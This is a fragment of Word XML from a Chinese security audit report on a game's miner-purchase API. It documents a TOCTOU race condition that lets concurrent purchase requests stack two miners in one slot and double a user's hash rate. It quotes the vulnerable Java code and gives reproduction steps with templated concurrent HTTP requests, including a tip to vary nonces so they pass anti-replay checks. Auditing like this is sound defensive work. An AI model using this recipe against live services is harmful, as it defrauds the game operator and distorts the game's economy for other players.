    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查询用户矿机列表：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>状态为 status=1、inStorage=0 的矿机记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="309"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">用户算力 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已包含两台矿机的贡献，高于单台矿机的预期值；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>持续挖矿，该用户的挖矿产出将以双倍算力速率积累，ROI 远超正常购买上限。</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：坑位1存在两条矿机记录，用户总算力异常翻倍，长期挖矿收益持续高于正常水平。</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31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312"/>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普通用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（持有有效 Bearer Token + 能通过签名校验即可，无需任何特权）</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313"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.getLevelDiff → MinerService.java.getLevelDiff</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audit_m146_514_purchase_ctrl-path5of11.md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：MinerService.java#purchase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_16" w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞15：购买矿机坑位占用校验存在 TOCTOU 竞态条件，可并发堆叠矿机突破坑位限制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="31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：购买矿机 TOCTOU 竞态条件 —— 坑位检查与写入非原子导致同一坑位可放入多台矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="31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src/main/java/com/gameBack/mjservice/service/MinerService.java:purchase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="31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31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31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purchase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法在事务开始后，首先通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读取坑位占用状态（无任何行锁），之后才通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户账户行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 锁。这两步之间存在窗口：坑位可用性检查和矿机写入不是原子操作，账户行锁仅保护余额扣减，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无法保护坑位的排他占用</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Thread A: canPlaceInSlot(slotId=1) → 坑位空，通过  ─┐</w:t>
              <w:br/>
              <w:t>Thread B: canPlaceInSlot(slotId=1) → 坑位空，通过  ─┤← 两者都在此窗口内读到"坑位空"</w:t>
              <w:br/>
              <w:t>Thread A: findByUserIdForUpdate → 扣除余额 → save(minerA in slot 1) → commit</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Thread B: findByUserIdForUpdate → 扣除余额 → save(minerB in slot 1) → commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最终同一坑位存在两台矿机，余额各自正确扣除。攻击者通过并发请求，以两倍金币成本让同一坑位承载两台矿机，从而获得超出坑位上限的算力，破坏游戏的核心资源限制机制。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/api/miner/purchase</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → TokenAuthFilter: 校验 Bearer Token，userId 从 Token 解析（可信）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SignAuthTestFilter: 校验请求签名（/api/miner/** 在签名保护范围内）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → MinerController.purchase: @Valid 校验 minerLevel[1-50] / slotId[1-9]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    → MinerService.purchase（@Transactional）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ① canPlaceInSlot（读坑位，无行锁）   ← 竞态窗口起点</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ② getBuyPrice（计算价格）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ③ findByUserIdForUpdate（账户行锁）  ← 仅锁定账户行，坑位无锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ④ 余额扣减 + userAccountRepository.save</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        ⑤ userMinerRepository.save(miner)   ← 竞态窗口终点，两个并发事务均可到达此处</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PurchaseForm 字段定义（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Integer minerLevel;  @NotNull @Min(1) @Max(50)</w:t>
              <w:br/>
              <w:t>//   Integer slotId;      @NotNull @Min(1) @Max(9)</w:t>
              <w:br/>
              <w:t>@PostMapping("/purchase")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; purchase(@CurrentUserId Long userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                       @RequestBody @Valid PurchaseForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = minerService.purchase(userId, form.getMinerLevel(), form.getSlotId());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(miner);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：MinerService.java — purchase()</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner purchase(Long userId, Integer minerLevel, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!canPlaceInSlot(userId, slotId)) {          // ← ① 坑位可用性检查（无行锁，竞态起点）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("坑位未解锁或已被占用");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal price = getBuyPrice(minerLevel, userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserIdForUpdate(userId)  // ← ② 仅锁定账户行</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(...);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (account.getGoldBalance().compareTo(price) &lt; 0) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("金币不足");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setGoldBalance(account.getGoldBalance().subtract(price));  // ← ③ 余额扣除</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = new UserMiner();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setMinerLevel(minerLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotId);   // ← ④ 两个并发事务均写入相同 slotId（竞态终点）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setStatus(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setIsCharged(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setStarLevel(0);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);  // ← 漏洞点：坑位无唯</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>一性保护，两条记录均可写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 坑位检查：MinerService.java — canPlaceInSlot()</w:t>
              <w:br/>
              <w:t>public boolean canPlaceInSlot(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, slotId)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isEmpty();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 纯读查询，无锁；结果在 findByUserIdForUpdate 之前已被消费，后续锁无法保护此检查</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并发发送以下两个完全相同的请求（同一有效 Token，同一坑位）：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&lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;valid_user_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;computed_sign_1&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerLevel":1,"slotId":1}</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/api/miner/purchase HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;valid_user_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce2&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;computed_sign_2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerLevel":1,"slotId":1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:i w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注：签名 nonce 须各不同以通过 nonce 防重放校验。</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319"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用目标账户登录，确保账户金币余额足以支付两次相同等级矿机的购买费用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="320"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">选定一个已解锁且空闲的坑位（如 slotId=1，该坑位 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isSlotUnlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 ≤6 的值直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>构造两个具有相同参数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 各异的签名请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发送（毫秒级同时触发，可用 curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 后台并发或脚本线程池）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">预期结果：两个请求均返回 200 成功，数据库中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_miner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表内同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, slotId, inStorage=0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 组合下存在两条记录，用户各扣除一次矿机费用，同一坑位承载两台矿机，获得双倍该坑位算力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="323"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内部使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 串行化等级更新，USDT 升级奖励不会重复发放，但算力统计 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 会将两台矿机的算力均纳入计算。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324"/>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（Bearer Token 鉴权，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/miner/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 TokenAuthFilter 校验范围内）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="325"/>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普通用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（无需管理员权限）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="326"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>附加前提：账户需有足够金币余额支付两次矿机购买</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修复建议方向（仅供参考）：</w:t>
      </w:r>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userMinerRepository.save(miner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之前、获得账户行锁之后，以同一数据库事务再次执行坑位校验（即将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 检查移至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之后），或在数据库层对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
